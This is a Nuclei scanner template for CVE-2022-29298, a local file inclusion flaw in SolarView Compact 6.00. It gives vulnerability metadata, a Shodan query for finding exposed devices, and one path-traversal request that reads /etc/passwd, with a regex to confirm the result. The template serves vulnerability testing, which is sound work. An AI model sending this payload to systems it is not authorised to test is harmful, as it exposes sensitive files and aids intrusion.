nuclei-templates/http/cves/2022/CVE-2022-29298.yaml

48 lines
1.6 KiB
YAML

id: CVE-2022-29298
info:
name: SolarView Compact 6.00 - Local File Inclusion
author: ritikchaddha
severity: high
description: SolarView Compact 6.00 is vulnerable to local file inclusion which could allow attackers to access sensitive files.
remediation: |
Apply the latest patch or update provided by the vendor to fix the LFI vulnerability in SolarView Compact 6.00.
reference:
- https://www.exploit-db.com/exploits/50950
- https://drive.google.com/file/d/1-RHw9ekVidP8zc0xpbzBXnse2gSY1xbH/view
- https://drive.google.com/file/d/1-RHw9ekVidP8zc0xpbzBXnse2gSY1xbH/view?usp=sharing
- https://nvd.nist.gov/vuln/detail/CVE-2022-29298
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-29298
cwe-id: CWE-22
epss-score: 0.15611
epss-percentile: 0.95367
cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.00:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: contec
product: sv-cpt-mc310_firmware
shodan-query: http.html:"SolarView Compact"
tags: lfi,solarview,edb,cve,cve2022
http:
- method: GET
path:
- "{{BaseURL}}/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 490a0046304402200e6efb85ee086b34d43c9b6e04302505dc8e424cb67ff5d03347251a0eb21399022077871efcc332aaa44f6b7ea7cffe2ced629fe791dafc7e397562d29b8fe323a3:922c64590222798bb761d5b6d8e72950